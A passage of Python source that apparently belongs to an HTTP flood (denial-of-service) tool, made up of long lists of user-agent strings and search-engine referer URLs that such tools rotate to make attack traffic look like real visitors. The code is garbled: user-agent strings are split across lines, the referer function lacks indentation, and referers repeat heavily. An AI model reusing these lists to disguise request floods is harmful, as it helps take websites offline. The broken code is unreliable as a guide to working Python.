headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27')
headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24')
headers_useragents.append('AbachoBOT')
headers_useragents.append('AbachoBOT (Mozilla compatible)')
headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL')
headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)')
headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)')
headers_useragents.append('About/0.1libwww-perl/5.47')
headers_useragents.append('Accelatech RSSCrawler/0.4')
headers_useragents.append('accoona Accoona Search robot')
headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)')
headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)')
headers_useragents.append('Ace Explorer')
headers_useragents.append('Ack (http://www.ackerm.com/)')
headers_useragents.append('AcoiRobot')
headers_useragents.append('Acoon Robot v1.50.001')
headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)')
headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)')
headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)')
headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)')
headers_useragents.append('ActiveBookmark 1.x')
headers_useragents.append('Activeworlds')
headers_useragents.append('ActiveWorlds/3.xx (xxx)')
headers_useragents.append('Ad Muncher v4.xx.x')
headers_useragents.append('Ad Muncher v4x Build xxxxx')
headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)')
headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)')
headers_useragents.append('AESOP_com_SpiderMan')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)')
headers_useragents.append('(Privoxy/1.0)')
headers_useragents.append('*/Nutch-0.9-dev')
headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)')
headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41')
headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)')
headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0')
headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0')
headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)')
headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)')
headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)')
headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)')
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')
headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)')
headers_useragents.append('CSSCheck/1.2.2')
headers_useragents.append('Cynthia 1.0')
headers_useragents.append('HTMLParser/1.6')
headers_useragents.append('P3P Validator')
headers_useragents.append('W3C_Validator/1.654')
headers_useragents.append('W3C_Validator/1.606')
headers_useragents.append('W3C_Validator/1.591')
headers_useragents.append('W3C_Validator/1.575')
headers_useragents.append('W3C_Validator/1.555')
headers_useragents.append('W3C_Validator/1.432.2.5')
headers_useragents.append('W3C_Validator/1.432.2.22')
headers_useragents.append('W3C_Validator/1.432.2.19')
headers_useragents.append('W3C_Validator/1.432.2.10')
headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64')
headers_useragents.append('WDG_Validator/1.6.2')
headers_useragents.append('amaya/11.3.1 libwww/5.4.1')
headers_useragents.append('amaya/11.2 libwww/5.4.0')
headers_useragents.append('amaya/11.1 libwww/5.4.0')
headers_useragents.append('amaya/10.1 libwww/5.4.0')
headers_useragents.append('amaya/10 libwww/5.4.0')
headers_useragents.append('amaya/9.55 libwww/5.4.0')
headers_useragents.append('amaya/9.54 libwww/5.4.0')
headers_useragents.append('amaya/9.52 libwww/5.4.0')
headers_useragents.append('amaya/9.51 libwww/5.4.0')
headers_useragents.append('amaya/8.8.5 libwww/5.4.0')
headers_useragents.append('amaya/11.2 amaya/5.4.0')
headers_useragents.append('amaya/11.1 amaya/5.4.0')
headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)')
headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)')
headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)')
headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)')
headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)')
headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)')
headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)')
headers_useragents.append('iTunes/9.1.1')
headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)')
headers_useragents.append('iTunes/9.0.3')
headers_useragents.append('iTunes/9.0.2 (Windows; N)')
headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)')
headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)')
headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)')
headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;')
headers_useragents.append('ProxiNet; Danger hiptop 1.0)')
headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)')
headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)')
headers_useragents.append('DoCoMo/1.0/N503is/c10')
headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)')
headers_useragents.append('MMP/2.0')
headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4')
headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1')
headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0')
headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0')
headers_useragents.append('PDXGW/1.0')
headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel')
headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)')
headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16')
headers_useragents.append('Version/4.0 Mobile Safari/533.1')
headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;')
headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;')
headers_useragents.append('Windows CE; PPC; 240x320)')
headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;')
headers_useragents.append('Windows CE; PPC; 240x320)')
headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619')
headers_useragents.append('Minimo/0.020')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610')
headers_useragents.append('Minimo/0.016')
headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO')
headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b')
headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5')
headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2')
headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750')
headers_useragents.append('WM5 PIE')
headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)')
headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)')
headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;')
headers_useragents.append('Version/4.0 Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;')
headers_useragents.append('VS840 4G Build/GRK39F)')
headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)')
headers_useragents.append('Version/4.0 Mobile Safari/533.1')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36')
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.bing.com/search?q=')
headers_referers.append('http://search.yahoo.com/search?p=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
